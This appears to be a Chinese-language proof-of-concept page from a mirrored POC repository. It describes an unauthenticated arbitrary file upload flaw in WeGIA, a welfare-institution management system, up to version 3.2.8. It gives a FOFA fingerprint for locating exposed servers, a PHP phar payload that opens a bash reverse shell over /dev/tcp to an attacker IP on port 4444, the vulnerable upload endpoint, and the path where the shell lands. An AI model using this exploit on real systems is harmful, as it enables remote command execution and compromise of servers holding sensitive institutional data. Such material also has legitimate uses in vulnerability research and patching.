admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 22:14:15 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/WeGIA/WeGIA存在前台任意文件上传漏洞.md

38 lines
905 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# WeGIA存在前台任意文件上传漏洞
**WeGIA是一个福利机构管理器并且具有一下几种功能并且在3.2.8及之前版本都存在前台任意文件上传漏洞且都可进行直接上传Phar等文件执行任意命令反弹Shell等操作。**
## fofa
```javascript
"./assets/vendor/select2/select2.js"
```
## poc
phar内容
```php
<?php
$ip = 'IP';
$port = 4444;
system("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'");
?>
```
将phar文件上传
```javascript
/WeGIA/html/socio/sistema/controller/controla_xlsx.php
```
![image-20250127154942138](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501271549223.png)
上传后,文件在 /WeGIA/html/socio/sistema/tabelas/shell.phar
![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501271550801.png)
## 漏洞来源
- https://mp.weixin.qq.com/s/GhaxwVBzJKHf0AucOU6hbw
Reference in New Issue Copy Permalink